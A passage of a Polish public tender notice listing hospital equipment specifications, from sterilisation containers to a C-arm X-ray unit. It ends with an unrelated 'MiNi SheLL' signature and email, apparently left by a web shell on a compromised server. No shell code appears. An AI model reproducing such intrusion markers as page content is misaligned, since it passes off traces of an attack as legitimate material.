 Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
3. Kuwety do moczenia ureterorenoskopów - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Balkoniki do nauki chodu - 3 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	- Podpórka dwukołowa wykonana z rurek duralowych o średnicy 22 milimetrów lakierowanych proszkowo.
- Wyrób spawany w osłonie argonu. Bez złączek z tworzywa powodujących gorszą stabilizację wyrobu.
- Podpórka zaopatrzona jest w dwa kółka z przodu o średnicy 10 centymetrów.
- Tylne podpory osłonięte są trudno ścieralnymi nasadkami z PCV.
- Wysokość w postaci złożonej najniższej 80 centymetrów.
- Możliwość regulacji na zatyczkach stalowych co cztery centymetry do wysokości 96 cm.
- Rączki  pokryte miękką pianką poliuretanową dającą pewny uchwyt i amortyzującą oparcie na nadgarstkach.
- Wyrób prosty nie wymagający konserwacji, duża trwałość i możliwość regulacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wózek do przewożenia chorych w pozycji leżącej - 2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wózek powinien być wyposażony w:
- barierki boczne
- wieszak do kroplówki
- kosz na ubranie pacjenta 
- krążki odbojowe w narożnikach leża,
- materac zaopatrzony w uchwyty umożliwiające przeniesienie pacjenta, kolor materaca seledyn
2	 konstrukcja wózka wykonana z profili stalowych pokrytych lakierem proszkowym odpornym na uszkodzenia mechaniczne
3	Leże dwusegmentowe wypełnione płytą z tworzywa przezierną dla promieni RTG ( w celu wykonania zdjęć na całej długości leża
4	Regulacja oparcia pleców
5	Regulacja wysokości leża dokonywana przy pomocy hydraulicznej dźwigni nożnej
6	Cztery koła jezdne blokowane centralnie, jedno z blokadą kierunkową
7	Uchwyt mocujący dla podkładu higroskopijnego w rolce
8.	Wymiary zewnętrzne wózka : 2050mm x 730mm +/- 10 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Chłodziarko - zamrażarka - 1szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chłodziarko - zamrażarka :
- do przechowywania odczynników chemicznych
- o pojemność 225L
- 3 półki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pompa infuzyjna dwustrzykawkowa - 2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rok produkcji nie starszy niż 2012
2	Pompa infuzyjna dwustrzykawkowa , dwutorowa z możliwością stosowania strzykawek o poj. 20ml, 50/60ml
3	Komunikacja w języku polskim
4	Możliwość stosowania strzykawek wielu producentów, wymiennie na obu torach. 
5	Pompa przeznaczona do wykonywania długotrwałych wlewów dożylnych 
6	Niezależne programowanie szybkości podawania dla każdego toru oddzielnie
7	Zakres szybkości wlewu od 0,1 ml/h do 99,9ml/h ze stopniowaniem co 0,1 ml/h
8	Dawka uderzeniowa tzw. BOLUS, dozowana w dowolnym momencie wlewu
9	System zabezpieczający przed obturbacją żyły KVO
10	Zasilanie sieciowe oraz awaryjne akumulatorowe. Przełączenie automatyczne
11	Alarmy dźwiękowe i świetlne: KVO, okluzja, koniec infuzji, rozładowanie baterii, brak zasilania z sieci
12	Możliwość umocowania pompy na statywie
13	Gwarancja min. 24 m-ce
14	Serwis gwarancyjny i pogwarancyjny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Wiertarki ortopedyczne - 2 komplety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Napęd akumulatorowy do nasadek wiertarskich i frezerskich	
-Napęd do nasadek wiertarskich i frezerskich
-tytanowa, pistoletowa obudowa dostosowana do mycia w środkach alkalicznych
- silnik bezszczotkowy komutowany elektronicznie o mocy 250W
- obroty max. Silnika 25000 obr./min
- obroty regulowane w zakresie od 0 do 1000 obr./min na głowicy nasadek wiertarskich
- obroty regulowane w zakresie od 0 do 250 obr./min na głowicy nasadek frezerskich
- zmiana kierunku obrotów przy pomocy przycisku na rękojeści napędu 
- kaniulacja O 4mm
- dystalna osłona drutu kischnera  w zestawie
- akumulator NiMH ze zintegrowaną elektroniką sterującą, o napięciu 9,6V i pojemności 1,95Ah możliwość serwisowej wymiany samych ogniw akumulatora, w zestawie
- zestaw do sterylnego wkładania akumulatora ( lejek i pokrywa komory akumulatora) w zestawie
- akumulatory niesterylizowalne umieszczane systemem lejkowym w sterylnej komorze akumulatora w rękojeści, bez oddzielnego pojemnika na akumulator
- adapter do oliwienia napędu w zestawie
- możliwość zasilania z sieci elektrycznej
- blokada przed niezamierzonym uruchomieniem
- na obudowie etykieta serwisowa z datą następnego przeglądu
2	Nasadka wiertarska Jacobs	
- nasadka wiertarska trójszczękowa typu Jacobs
- nasadka wraz z kluczykiem
- zakres min. 0,6-6,5mm
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 1000 obr./min
- moment obrotowy 5 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
3	Nasadka do drutów Kirschnera	
- Nasadka do drutów Kirschnera
- trzy zakresy pracy ( 0,6-1,8mm; 1,8-3,0mm; 3,0-4,0mm
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 1000 obr./min
- moment obrotowy 5 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
4	Adapter typu DIN	
- Adapter typu DIN
- kompatybilny z nasadką typu AO
5	Nasadka frezerska duże AO	
- Nasadka frezerska duże AO
- kaniulacja O 4mm
- Maksymalna prędkość obrotowa 250 obr./min
- moment obrotowy 19 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
6	Nasadka frezerska Zimmer/Hudson	
- Nasadka frezerska Zimmer/Hudson
- kaniulacja O 4mm
 - Maksymalna prędkość obrotowa 250 obr./min
- moment obrotowy 19 Nm
- na obudowie etykieta serwisowa z datą następnego przeglądu
7	Kosz stalowy dla jednego urządzenia	
Kosz stalowy, perforowany
- uchwyt napędu / piły 1 szt.
- uchwyt pokrywy komory akumulatora 1 szt.
- uchwyt lejka do sterylnego zakładania akumulatora 1 szt.
- uchwyt do 5 nasadek wiertarskich /frezerskich
- uchwyt na brzeszczoty
- uchwyt na dystalną osłonę drutu Kirchnera min. 1 szt.
8	Wanna kontenera	
-Wanna kontenera 1/1
- wymiary zewnętrzne 592/274/135mm
- wykonana z aluminium
- uchwyty kontenera blokujące się pod kątem 90 stopni ( redukuje możliwość urazów dłoni)
- uchwyt na tabliczki identyfikacyjne po obu stronach wanny kontenera
9.	Pokrywa kontenera	Pokrywa konteneru wykonana z polietylenu
- w kolorze niebieskim
- podwójny system zabezpieczeń ( plomby) papierowe z identyfikatorami oznaczonymi kolorem lub plomby plastikowe
- filtr mikroporowy, teflonowy na 5000 cykli sterylizacji - 2 szt.
10	Tabliczka identyfikacyjna	
Tabliczka identyfikacyjna , kolor czerwony/niebieski, opis do 13 miejsc.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Unit stomatologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	OPIS PRZEDMIOTU ZAMÓWIENIA	PARAMETRY WYMAGANE
I. Fotel stomatologiczny
1.	Przystosowany do pracy na 4 ręce	TAK
2.	Sterowanie elektryczne	TAK
3.	Napęd elektromechaniczny / podnoszenie do 175 kg	TAK
4.	Funkcja miękkiego startu/ pierwsza faza ruchu z obniżoną prędkością	TAK
5.	Zagłówek chirurgiczny dwuprzegubowy	TAK
6.	Sterowanie ruchami fotela z konsoli lekarza i wyłącznika nożnego	TAK
7.	4 programowane pozycje fotela	TAK
8.	Pozycja zerowa	TAK
9.	Pozycja spluwaczkowa i powrót do ostatniej pozycji pracy	TAK
10.	Brak efektu  wyciągania koszuli	TAK
11.	Bezszwowa tapicerka odporna na środki dezynfekcyjne	TAK
12.	Wyłączniki awaryjne ruchu fotela	2 szt.
13.	Łatwa do samodzielnej wymiany osłona podłokietnika	TAK
II. Stolik lekarza
1	Ramię pantograficzne	TAK
2	5 rękawów od góry z blokadą w pozycji pracy	TAK
3.	Obrotowa tacka	TAK
4.	System odprowadzania zużytego oleju	TAK
5.	Niski tor ruchu ramion pantograficznych narzędzi, nie zaczepia o reflektor	TAK
6.	Sterowanie ruchami  fotela i unitu	TAK
7.	Łatwo zmywalny pulpit sterujący	TAK
8.	Negatoskop	TAK
III. Blok spluwaczki ze ślinociągiem:
1.	Zintegrowany z fotelem	TAK
2.	Odchylany od pacjenta	TAK
3.	Ślinociąg wodny	TAK
4.	Obieg wody destylowanej	TAK
5.	Czasowe i regulowane napełnianie kubka i opłukiwanie spluwaczki	TAK
IV. Sterownik nożny
1.	Elektryczny	TAK
2.	Praca końcówki z wodą	TAK
3.	Praca końcówki bez wody	TAK
4.	Sterowanie ruchami fotela	TAK
V. Reflektor
1.	Mocowany na ramieniu pantograficznym	TAK
2.	Konstrukcja   metalowa	TAK
3.	Odbłyśnik i osłona przednia wykonane ze szkła	TAK
4.	Uchwyt umożliwiający stosowanie jednorazowych osłonek	TAK
5.	Standardowa żarówka halogenowa , łatwa do samodzielnej wymiany	TAK
6.	Bezdotykowe załączenie i sterowanie natężeniem światła	TAK
VI. Kompresor
1	Cichy, bezolejowy ( w obudowie wygłuszającej) pracuje w gabinecie głośność mniejsz niż 45 dB	TAK
2	wydajność	70 l/min
VII. Wyposażenie
1.	Końcówka turbinowa	TAK
2. 	Mikrosilnik elektryczny	TAK
3.	Kątnica mikrosilnika	             TAK
4.	Strzykawka trójdrożna	TAK
5. 	Lampa polimeryzacyjna	TAK
6.	Skaler piezoelektryczny	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Aparat RTG z ramieniem C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.P.	OPIS PRZEDMIOTU ZAMÓWIENIA	PARAMETRY WYMAGANE
Generator
1.	Zasilanie jednofazowe	230 V, 50Hz
2.	Zakres dopuszczalnych wahań napięcia zasilającego 	+/- 10%
3.	Moc generatora 	max. 2,2kW
4.	Typ generatora, wysokiej częstotliwości 	Min. 20 kHz
5.	Prąd skopii ciągłej/ impulsowej 	Min. 10 mA
6.	Radiografia cyfrowa	TAK
7.	Prąd radiografii analogowej i cyfrowej	Min. 20 mA
8.	Układ minimalizujący dawkę przy skopii	Min. 50%
9.	Zakres napięć fluoroskopii i radiografii	40-110 kV
10.	Automatyka doboru parametrów skopii	TAK
11.	Skopia pulsacyjna w zakresie 1 do 25 pulsów/s	TAK
12.	Kontrola czasu trwania pulsu min. w zakresie 10-25ms	TAK
Lampa X - RAY
13.	Lampa ze stacjonarną anodą	TAK
14.	Totalna filtracja	Min. 3,8mm Al.
15.	Wymiary ogniska lub ognisk jeżeli są dwa	Max. 0,6mm
16.	Pojemność cieplna anody	Min. 50kHU
17.	Pojemność  cieplna kołpaka	Min. 1100 kHU
18.	Szybkość chłodzenia anody	Min. 51 kHU/min
19.	Kolimator typu IRIS	TAK
20.	Kolimator szczelinowy z rotacją	TAK
21.	Ustawienie kolimatorów na zamrożonym obrazie bez użycia promieniowania 	TAK
Wózek z ramieniem C
22.	Waga wózka z ramieniem C	Max. 310 kg
23.	Głębokość ramienia C	Min. 67 cm
24.	Odległość kołpak - wzmacniacz obrazu ( wolna przestrzeń)	Min. 75 cm
25.	Odległość SID	Min.96 cm
26.	Zakres ruchu poziomego ramienia C	Min. 20 cm
27.	Zakres ruchu pionowego ramienia C	Min. 42 cm
28.	Zakres obrotowy ramienia C wokół osi pionowej ( Wig - Wag)	Min. 20°
29.	Zmotoryzowany ruch pionowy	TAK
30.	Całkowity zakres obrotu ramienia wokół osi poziomej	Min. +/- 220°
31.	Zakres ruchu orbitalnego 	Min. 135°
32.	Ramie C zbalansowane w każdej pozycji	TAK
33.	Urządzenie zabezpieczające przed najeżdżaniem na leżące przewody	TAK
34.	Wielofunkcyjna pojedyncza dźwignia służąca jako hamulec oraz sterowanie kołami aparatu	TAK
35.	Wielofunkcyjny programowalny pedał z minimum 4 trybami pracy koniecznie z możliwością włączania promieniowania i zapisu oraz włącznik ręczny i dodatkowy klawisz wyzwalania promieniowania np. w obrębie ramienia C, 	TAK, podać
36.	Uchwyt na wzmacniaczu obrazu do łatwego pozycjonowania ramienia podczas zabiegu	TAK
Wzmacniacz obrazu
37.	Średnica nominalna	min 9 cali
38.	Ilość pól wzmacniacza obrazu	min 3
39.	Rozdzielczość kamery CCD	1024 x 1024
Monitor, matryca
40.	Monitor HD umieszczony na wózku połączonym z ramieniem C	TAK, rozdzielczość min. 1900x1200
41.	Monitor o przekątnej min. 24 cali	TAK
42.	Kąt widzenia  obrazu min. 175 stopni	TAK
43.	Wyjście TV OUT do podłączenia dodatkowego monitora lub systemów nawigacji 	TAK
44.	Ilość obrazów wyświetlana jednocześnie na monitorze 	Min. 17 obrazów
45.	Matryca obrazu zapamiętanego	Min. 1024x1024 pikseli x 30 bit
46.	Pojemność pamięci na dysku twardym	Min. 10000 obrazów
47.	Archiwizacja poprzez port USB - zapis obrazów w formacie umożliwiającym odtworzenia zdjęć na dowolnym komputerze bez konieczności posiadania dodatkowego oprogramowania . Dodatkowy system archiwizacji	
TAK
48.	Archiwizacja obrazów w formacie TIFF z możliwością archiwizacji obrazów formacie DICOM ( przy aktywnej funkcji DICOM - rozbudowa z przyszłości) i automatycznym dogrywaniem przeglądarki zdjęć	TAK
49.	Funkcja  Last Image Hold (LIH)	TAK
50.	Automatyka parametrów fluoroskopii	TAK
51.	ZOOM	Min. x 4
52.	Cyfrowe odwracanie obrazu góra,dół, lewo prawo na monitorze	TAK
53.	Obraz lustrzany	TAK
54.	Obrót obrazu płynny cyfrowy bez ograniczeń kąta i kierunku obrotu i wyzwalania dodatkowych dawek promieniowania	TAK
55.	Automatyczna regulacja jasności monitora w zależności od oświetlenia sali	TAK
56.	Układ pomiaru dawki z wyświetlaczem cyfrowym i archiwizacją dawki na zdjęciu na monitorze, w pamięci aparatu oraz na zdjęciu drukowanym	TAK
57.	Monitor dotykowy znajdujący się na wózku ramienia C kolorowy do sterowania wszystkimi funkcjami generatora i programami aparatu	TAK
Wyposażenie dodatkowe
58.	4 szt. pamięci przenośnej Pen Drive 4 GB	TAK
59.	Videoprinter na papier min. 210mm	TAK
60.	4 komplety ochrony radiologicznej ( fartuch i tarcza) o ekwiwalencie 0,25mmPb	TAK
61.	Instrukcja użytkownika w języku polskim ( z dostawą) 	TAK
62.	Dodatkowy system archiwizacji 2x	TAK
63.	Rok produkcji	2012
64.	Aparat fabrycznie nowy	TAK
Warunki gwarancji i serwisu
1	Okres gwarancji i rękojmi min. 24 m-ce	Podać
2.	Liczba napraw powodująca wymianę podzespołu na nowy - 3 naprawy	TAK
3.	Czas reakcji: zgłoszenie - naprawa 2 dni robocze	TAK
4.	Czas usunięcia usterki do 7 dni roboczych od momentu zdiagnozowania usterki gdy zachodzi konieczność sprowadzenia części zamiennych	TAK
5.	Okres gwarancji dostępności części zamiennych od daty sprzedaży aparatu	Min. 10 lat
6.	Bezpłatny przegląd okresowy w czasie trwania gwarancji	

7.	Forma serwisu pogwarancyjnego	Podać
8.	Autoryzowany serwis gwarancyjny na terenie Polski	TAK
9.	Paszport techniczny	TAK
Wymagania dodatkowe 
1	Przeprowadzenie na koszt Wykonawcy testów akceptacyjnych aparatu 	TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com